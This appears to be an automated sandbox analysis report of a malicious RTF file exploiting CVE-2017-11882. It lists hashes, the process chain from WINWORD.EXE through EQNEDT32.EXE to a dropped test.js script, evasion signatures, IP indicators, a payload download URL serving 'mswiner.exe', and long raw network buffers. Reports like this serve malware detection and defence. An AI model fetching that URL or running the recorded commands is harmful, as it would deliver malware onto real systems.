paladin316

1312RTF_8d88b86a99486d619c4e98d33c5e8e30_rtf_2019-09-07_21_30.txt

Sep 8th, 2019
  1.  
  2. * ID: 1312
  3. * MalFamily: "CVE-2017-11882"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "RTF_8d88b86a99486d619c4e98d33c5e8e30.rtf"
  8. * File Size: 21106
  9. * File Type: "Rich Text Format data, version 1, ANSI"
  10. * SHA256: "f14a49bc21e63284df713b631d0bce8c5c41ba79d897d6b15720ed21af7dc0c0"
  11. * MD5: "8d88b86a99486d619c4e98d33c5e8e30"
  12. * SHA1: "362d7def11410b2afc3b48fb62a5eeabd6328a8a"
  13. * SHA512: "3fd3fac8e21f7e7391a39fc2f412c34ffbda5189870ed87a851608c30019ef43b13b6588cfe40b05ccb5c05e1db90556eb67811b6c48f1bf0838d47368f257a4"
  14. * CRC32: "CDDF75A6"
  15. * SSDEEP: "96:Mwu1DW24rDJN1xa+DY/e5qFyAuFBX7QRpKzk+p89CU61S461SRM5WGviFa/G5VoE:Tu9KJqHiAvwGvV/GZxlvBfwGvVN"
  16.  
  17. * Process Execution:
  18. "WINWORD.EXE",
  19. "svchost.exe",
  20. "EQNEDT32.EXE",
  21. "EQNEDT32.EXE",
  22. "cmd.exe",
  23. "wscript.exe",
  24. "WmiPrvSE.exe",
  25. "explorer.exe"
  26.  
  27.  
  28. * Executed Commands:
  29. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
  30. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  31. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding",
  32. "cmd.exe /c%tmp%\\test.js A\\x12\\x0cC",
  33. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js A\\x12\\x0cC",
  34. "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\test.js\" A\\x12\\x0cC",
  35. "C:\\Users\\user\\AppData\\Local\\Temp\\test.js A\\x12\\x0cC"
  36.  
  37.  
  38. * Signatures Detected:
  39.  
  40. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  41. "Details":
  42.  
  43.  
  44. "Description": "The RTF file contains embedded content",
  45. "Details":
  46.  
  47. "embedded content": "Object 2 index 000000EDh contains embedded object with size 1898 bytes"
  48.  
  49.  
  50. "embedded content": "Object 2 index 000011A8h contains embedded object Equation.3 with size 3584 bytes"
  51.  
  52.  
  53. "embedded content": "Object 2 index 000033E2h contains embedded object Equation.3 with size 3072 bytes"
  54.  
  55.  
  56.  
  57.  
  58. "Description": "Guard pages use detected - possible anti-debugging.",
  59. "Details":
  60.  
  61.  
  62. "Description": "Detected script timer window indicative of sleep style evasion",
  63. "Details":
  64.  
  65. "Window": "WSH-Timer"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Attempts to connect to a dead IP:Port (8 unique times)",
  71. "Details":
  72.  
  73. "IP_ioc": "23.60.72.96:443"
  74.  
  75.  
  76. "IP_ioc": "92.123.51.45:443"
  77.  
  78.  
  79. "IP_ioc": "23.217.7.193:443"
  80.  
  81.  
  82. "IP_ioc": "45.11.19.145:80 (unknown)"
  83.  
  84.  
  85. "IP_ioc": "104.18.25.243:80"
  86.  
  87.  
  88. "IP_ioc": "72.21.91.29:80"
  89.  
  90.  
  91. "IP_ioc": "52.109.2.18:443"
  92.  
  93.  
  94. "IP_ioc": "52.109.2.14:443"
  95.  
  96.  
  97.  
  98.  
  99. "Description": "Performs HTTP requests potentially not found in PCAP.",
  100. "Details":
  101.  
  102. "url_ioc": "45.11.19.145:80//mswiner.exe"
  103.  
  104.  
  105.  
  106.  
  107. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  108. "Details":
  109.  
  110. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  111.  
  112.  
  113. "suspicious_request_iocs": "http://45.11.19.145/mswiner.exe"
  114.  
  115.  
  116.  
  117.  
  118. "Description": "Performs some HTTP requests",
  119. "Details":
  120.  
  121. "url_iocs": "http://45.11.19.145/mswiner.exe"
  122.  
  123.  
  124.  
  125.  
  126. "Description": "A scripting utility was executed",
  127. "Details":
  128.  
  129. "command": "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\user\\AppData\\Local\\Temp\\test.js\" A\\x12\\x0cC"
  130.  
  131.  
  132.  
  133.  
  134. "Description": "Uses Windows utilities for basic functionality",
  135. "Details":
  136.  
  137. "command": "cmd.exe /c%tmp%\\test.js A\\x12\\x0cC"
  138.  
  139.  
  140.  
  141.  
  142. "Description": "A document file initiated network communications indicative of a potential exploit or payload download",
  143. "Details":
  144.  
  145. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00~\\x01\\x00\\x00z\\x03\\x01t\\x18\\xaaqo\\xaex\\xb7\\xae\\xbd4ki\\x18!p\\x83\\xedi7\\xber\\x80\\x9a\\xcc6i\\x13cc\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x009\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00 \\x00\\x1e\\x00\\x00\\x1broaming.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  146.  
  147.  
  148. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xb5\\x94\\x8c-\\xf8\\xa7\\x06\\x02\\x01&\\xd6&g\\xcd\\xa3k^e\\x07\\x15\\xe5\\x89\\x04\\x17tzv\\x99%\\x8a\n(\\xc8\\x06,\\x8a\\x83u/\\x0b'\\x02\\x93\n'\\xbb\\x8a)f\\x84\r\\xe8xj\\x19\\xcab\\xa4\\x1e\\xe7\\xea\\xe57\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x9bx5\\x9a\\x89-gdfl\\x83\\xa8<\\xa6\\x14\\x98\\x8dp\\x9e5)\\xb9\\xaa\\xea`c\\x8b\\x0f\\x93\\x9f~\\x88\\x86p\\x8a\r\\xe4@e\\x0e\\x1c\\xddc\\xed\\xfb\\xaf\\xd3b"
  149.  
  150.  
  151. "http_request": "winword.exe_WSASend_get /mfewtzbnmeswstajbgurdgmcgguabbtbl0v27rvz7lbduom%2fnyb45spuewqu5z1zmijhwmys%2bghunoz7oruetfaceai4elabvpzalrznpjlrv1u%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nuser-agent: microsoft-cryptoapi/6.1\r\nhost: ocsp.digicert.com\r\n\r\n"
  152.  
  153.  
  154. "http_request": "winword.exe_WSASend_get /mfqwujbqme4wtdajbgurdgmcgguabbrpc1vzt9qvn7bzy3iidtbhla4mkqquwiif1tycsck3fd7%2fhijo5ox%2f%2bn0ce3saagyvv14%2fmepdgh0aaaaabk8%3d http/1.1\r\nconnection: keep-alive\r\naccept: */*\r\nif-modified-since: sat, 23 mar 2019 17:46:18 gmt\r\nif-none-match: \"dd54d75d468"
  155.  
  156.  
  157. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p>kd \\xe1\\xb8\\x1eb\\x93\\xc9\\xe6+s\\xbc\\x88k\\x9a\\x1c\\x9f\\xc9\\x8eu\\x0f!\\x96p(|g%\\xb8\\xeb\\x0f*\\xba\\x0c\\x04\\xca|\\x7flk@\\xde\\xb5\\xa4\\xfe\\xda\\xfd\\x84y\\xea?\\xc8\\xe8\\xbff\\xc0\\xb4\\xb29\\xa3\\xc6\\xba\\xdaw\r\\xa1o\\xf7\\x0c\\xdb8\\xc2\\xa8g\\x16\\x03\\xa3\\x15\\x97\\x04\\x8e\\xa3\\x9f\t\\xf0\\x8b\\x1c\\xff\\xbc=\\x05\\xa9=h\\xcb\\xb6\\xa0k\\x96k8v\\x0f\\xb5w\\x80\\xfcru\\x8d\\xf1\\x14p\\xbf\\x9e\\x96\\xdf\\xaehu\\xa53\\x9e\\xd0\\xaf<\\xa5\\xb3s\\x1ag\\x02\\xc6\\xe1xe\\x9d\\x11\\xb3\\xdd#\\xe7\\xf8\\x13u\\xf2%\\xec\\xf3c\\x89\\xda\\xc3\\xbc\\xe2'\\x83v~\\x90\\x04\\xd8\\xf6\\x9c\\x9d\\xd1f\\xe3e\\x95\\xf1y\\xf1\\xbca\\xf8\\x19a\\xca-\\x1b\\xac\\xacsmx`\\x94+vm\\xc4n\\xfert\\x07~\\x93l\\x05\\xcfey<\\xea \\xe4\\xeds>\\xa3d7\\x07\\x08\\x18\\x82\\xef?\\xb9\\xa4\\xde9gt\\xd7\\xba\\xae\\x83\\xf0\\x05\\xd9\\xb1h\\xf0\\xf2\r\\x87\\xff\\x0f\\x97\\x1f\\xef"
  158.  
  159.  
  160. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x02 _d\\xb5\\x0fv\\xbb\\xc3\\x8ath\\x16\\xf2\\x9br7\\xaa\\xe1>p\\e\\xe1s9\\x02\\xcfr;18\\xf2\\xb4\\xc8c\\x94k\\x10\\x11\n\\xd7v\r\\x82\\xf8q\\xae\\xa0\\x93\\xban\\xdei\\xee\\xc7\\x12\\xb1dh\\xcb^md\\xd2\\xdd>z\\x91\\x9do\\xb0\\xcc\\x92/8\\x90\\xc5%\\x96\\x1f\\x84\\xad\\x89\\x11\\xfc\\xde\\xc9\\xc2\\xa9\\xc9-i8df+\\x8b\\xb9\\x8c\\xaa|\\x12\\xe0\\xab\\xd47\\x89\\xb6<o\\xe7/yn;k\\xd3\\x80ame8\\xa6\\x1a\\xbcxgqh\\x0c\\x9f\\xb6\\xc6\\xd9\\xc6\\xc1\\xe8\\xb5\\xa9\\xc8\\xbe\\xad\\xc5\\xadx\\x1e\\x9c\\xa8\\x83^\\xe9 \\xb12d\\xd6a\\x19\\x1f\\x8e\\xce\\x13\\x04\\x10z%\\xb1k'p\\xe4\\x91b\\xff\\x821\\x1f\\xbb\\xc9\\xe2\\x1b\\x0b\\x9d\\xb06j/p\\xee\\xc8\\x8a\\x04=\\xa5\\x11\\xcc\\x8fh\\xbf\\x06si\\x7f\\xe61\\xda\\x0f\\xba.\\x12\t\\x18\\x02\\x1eo\\x06a\\x8e\\xf2\\xc0\\x8e\\x14\\x9c\\x11\\x18\\xbb\\xa8j\\xac\\xc4\\x81\\x8f\\x89\\xa4\\xbd*\\x1a\\xca0n\\xa4\t\nnk/ji\\x83"
  161.  
  162.  
  163. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00z\\x01\\x00\\x00v\\x03\\x01t\\x18\\xafid\\x86\\xef\\x9a!\\x10\\x87\\xd2\\xfc\\xba4\\x89\\xcd&o\r1|\\x9f\\xbc\\x7f\ny\\xd9k\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x005\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1c\\x00\\x1a\\x00\\x00\\x17odc.officeapps.live.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  164.  
  165.  
  166. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xc7\\xcd\\xdaj\\xf1\\x80\\xc8\\xbddt\\x07z4\\xbb>\\xe7\\x8a(c.g\\x1e\\xe5\\x04\\xe4\\xc5%\\xfc73\\x15%dk\\x15(>\\xe6x\\xea\\x02\\xd5i\\x07\\x93\\x03\\xf9^\\x0cf5\\x82\\xc2\\xdb\\xc8p\\xb3\\x00\\xae\\xa8n\\xebk\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000n\\xf4\\xb4\\xa8\\x1c6cu\\x18\\xee.4\\xae%\\x88+#\\xc1\\xea\\xca\\xbaa\\xb7\\x92\\x81\\xa4\\x19\\xa5uy\\xaf\\x17\\x99\\xc84\\x01\\x8da\\x00b'pn1\\x11$"
  167.  
  168.  
  169. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01px\\xa0\\x1a\\x94\\xb3|\\x00\\x02\\x04\\xba\\xa8\\x16\\xb5\\x92\\xc9\\x87\\x18<\\xaa\\xbd\\x92\\xc3\\x01\\x9a;\\xbb|\\xc2c\\xb0\\xf3\\xa0\\xeac\\x7f\\xfd8\\xc0\\x14g=9\\x01\\xb6\r8u\\xfb\\x084\\x02\\x84ak\\xac\\x82\\x91\\xf9c\\xf7\\x16bk\\x7f\r\\x1b\\x1d\\x1fn\\xdb<\\x9f\\x9b_mhh\\x1a\\xd6\\xb4k\\xe3\\xbdkr\\xe3\\xf0b\\xeb\\x1d\\x12\\xea(\\xd5\"\\x8d\\xe9#s\\x818k\\xdd\\x98\\xbd\\xebsr\\xd2(ds\\xdc\\xae\\x83m1\\xbf%\\x99&\\xbc5\\xa6\\xd3o\\xc84\\xbe\\xbf\\x025\\xed\\xb1&h\\x8c\\x17\\x12\\x885l\\xce\\xf6\\x97\\xd2\r\\xc5\\xb5;\\xb1\\xb0~\\xb2v*nm\\x89\\xdf\\xd8\\xde\\x9d5ro\\xd4\\xf4\\x03jm\\xc5*\\x04>\"\\xe6\\xd0\\x9b\\xc5e\\xf7p(\\xbd\\xdb35+-\\xeda\\xc4\\xe2.\\xfe\\xca-7\\x1b\\x8d\\x10\\xf02`\\x83zo\\x88\\x8e\\xd1t\\x8a\\xc7\\xfd\\xd4\\xeea\\x7f\\xd7\\x1e\\xd7\\x0e\\x8c\\x8f\\x13x\\xaa\\xd2i\\x84\\xff\\x83\\xe4\\x04\\x05\"\\xd8\t\\xb5\\xcb\\xde\\xfdd\\xff\\x18<"
  170.  
  171.  
  172. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x01\\x00\\x00y\\x03\\x01t\\x18\\xb4\\x0f\\x8c8\\x17nj~gt\\x18\\x1f\\x98\\x8a\\xe7)\\xc6\\x04\\xa4a\\x1a\\xb8k\\xa4\\xc5s<\\x0c\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x008\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x1f\\x00\\x1d\\x00\\x00\\x1atemplateservice.office.com\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  173.  
  174.  
  175. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x042~\\x89\\xf9\\xfb\\xc5\\xb8\\xb33\\xba>.u\\xf1\\x05\\x1f\\xf1\\xc4\\xce\\x1fq\\xb0#l\\x05\n:\\xff\\xb2\\xc2+\\xe9\\xc8\\x07\\xc5\\xd0k\\xfbm\\xb2\\xb5$\\x1cg\\xe6\\xe4\\x1d4-\\xdb\\xbe\\xba\\xc9\\x80\\x85\\xd7\\xee\\xdb\\xd9\\xa4y\\x91\\x8b\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000j\\x91d\\xae4\\xe9\\x07\\xb7\\xd0\\xa7\\xdc3\\xfcj.\\x8d\\xc1\\xad\\xf5\\x98\\x9c\\xe1\\xce\\xac\\x1c<1e\\xef?\\x904\\x8a\\x16\\xff\\x0ev\\x1a\\x1ak\\x0fd\\x03\\xb3\\xba\\x1b\\xaf"
  176.  
  177.  
  178. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x01p\\xf65\\x00\\xfbzl\\xe63\\xbe\\xc9\\x14\\xcd\\x07\\xb9\\xa9h\\xe5\\x11g\\xbf\\xd2\\x1b\\xfa\\x99`\\x91i\\xe7m\\xa2\\xcf\\x13nh\\xb1\\xb2\\x14\\xd3s5\\xbc\\xfe\\xee\\xae\\xd7,\\xe0z\\xf8\\xc8+\\xf6\\x90\\xf7\\xdb\\x7f\\xc0\\xd4\\x94\\xc0\\x9a:\\xc2\\xc3`\\xc7\\x8co\\xb6\\x93\\xac\\xc0\\xe2/v\\x88\\xa0\\x07\t\\x9ac\\x0c\\x86\\xff\\xaas\\xf5x\\x9fl\\xf1\\xd2$\\xdd\\xb8\\xd0\\x8e\\x8a\\xd3)\\x81\\xf3\\x15@\\xf7\\x9c\\xb8\\x93m\\xd5gd\\xe2\\xfa\\xa0\\x84\\xed\\xe7\\xd2'\\xb7y`a\\x17\\x8a5\\x93d\\xe5\\x91\\xb4\\xb1\\x95\\xa2\\xae\\x93\\xda\\xba^\\xc5q0\\xbdb\\xcb\\xccx\\x0ff\\x06\\xd7\\xb4\\xee\\x80\\x84\\xf8\\xb1`\\x05\\x8cc\\xa0\\x97o\\x87)\\x11\\xf8#h\\xa9t\\xf7\\x08\\x189.\\xa2\\\\x06)\\xc5\r\\xb2\\xf0cc\\xee\\xf4\\xa1\\xa2\\xdf\\x9e\\x90\\x93!\\xa6\\xe9\\x08\\x13\\xd7\\xcf\\xbf\\xbd\\x19\\xd9\\xa1%\\x1b\\xa6p\\xdc\\xa9\\xd0\\x08t;\n:j\\x01r\\x0b\\x05\\xaa\\x9c\\xfb\\x97sz\\xb7\\xa7\\xba; 0\td:\\x97bfr\\xcb\\x86o\\xc1/"
  179.  
  180.  
  181. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x83\\xf8\\xc1\\xa06\\xfa\\x04wi\\x7f$h\n\\xa5u\\xc6l\\x14\\x94\\xe9y\\xa2\\x98\\x0e78\\xb3\\xd4\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  182.  
  183.  
  184. "http_request": "winword.exe_WSASend_\\xff\\xff\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x16\\xb6\\xecx\\xf50-<\\x9e\\x8b\\xee\\xf3\\x05\\xcc\\xd8\\xfd\\xcc1\\xef\\xabr\\xeb^8\\xbe\\xf9\\xa5\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  185.  
  186.  
  187. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xfe\\xa5#\\xae\\x90#\\xe9/\\xcd \\x12w\\xf8\\xe9m\\xf8\\xf2l\"#b~c\\xf6\\x11\\xfbp\\x97\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  188.  
  189.  
  190. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xc6\\xf8\\x9el\\x95\\xaba\\xd3dg5\\x0b\\x89;\\xb0\\x0e\\xc0\\x92\\xdf\\x0b\\xee\\xb8\\xcd\\x1d\\xa8\\xbc<m\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  191.  
  192.  
  193. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5n\\xbe\r\\x0e4efi jr\\x8c\\xe4\\xb3i28\\x9a\\xed\\x82\\x07dc\\xa2\\xb1.f8\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  194.  
  195.  
  196. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xff:\\xa4\\x06\\xa3\\x13=\\x9e\\xb2\\xc6\\xc7/\\xa1\\xff\\xf6\\xba0\\x80\\x7f\\xbcj\\xa3\\x1e\\xfe\\x90\\xb0\\x04\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  197.  
  198.  
  199. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5p\\xa9*:\\xa3\\xd7\\x1ek\\x1e\\xd3etu\\xeb%\\xe7\\xa4u<?\\xe1\\xa3\\xff\\x99\\xc6\\x86\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  200.  
  201.  
  202. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x0f\\x0b\\xc4^\\x94\\xd4,\\xd7\\x8e\\xd1\\xdc\\xb4\\xd2dw\\xb4\\xb5\"\\xfe\\xb4\"\\xbbg\\x1ai\\xa82\\x9a\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  203.  
  204.  
  205. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5cpc\\xab\\xdd#4\\xce)\\x1a\\xae\\xa3\\xb7\\xb6\\x1e\\xce~;\\xc4\\xcd^\\xbb\\xce\\xee\\x0c\\x14\\x97\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  206.  
  207.  
  208. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\xda\\xdbl7\\xe3\\xb2\\xe5\\xd5\\x93\\xaf\\x90\\xbd@\\xade\\xc7\\xd8\\x08\\xbc\\x81\\xfa\\xa0\\x97o\\xd1:\\x03\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  209.  
  210.  
  211. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5f8\\x1e\\xac\\x07\\xac\\xaf\\x0e\\x08!i\\xc2\\x99\\x05\\xf7o:s\\x1a\\xe02z5\\x17`\\xc6\"\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  212.  
  213.  
  214. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5t\\xc8\\x90\\x88r(ediw\\xb3\\xbe\\x84\\xbez\\xd9\\xff\\x14\\xe3\\x04\\xf9\\x9b:\\xd8\\xe9\\x7fj\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  215.  
  216.  
  217. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x83\\x90\\xabb\\xee@\\xb6\\xc7\\x87\\x14x|\\xe6sw\\xd5'td\\xffkq\\xb9:\\x91\\xf3\\xcb\\xa2\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  218.  
  219.  
  220. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x97k\\xff\\x89\\x19\\x15\\\\x87\\xfc\\xef\\x038+3\\xac\\x97\\xd3\\x072#$n'\\xb9h\\xf1\\xfc\\xb6\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  221.  
  222.  
  223. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01t\\x18\\xb5\\x9d\\x81\\x91z=)\\xf2/\\xf4\\xaa\\xe5\\xa0\\x07\\x01&\\x88\\x88\\xbc\\xe5\\xe5\\x98\\xd8\\x1a\\xf5'y^\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
  224.  
  225.  
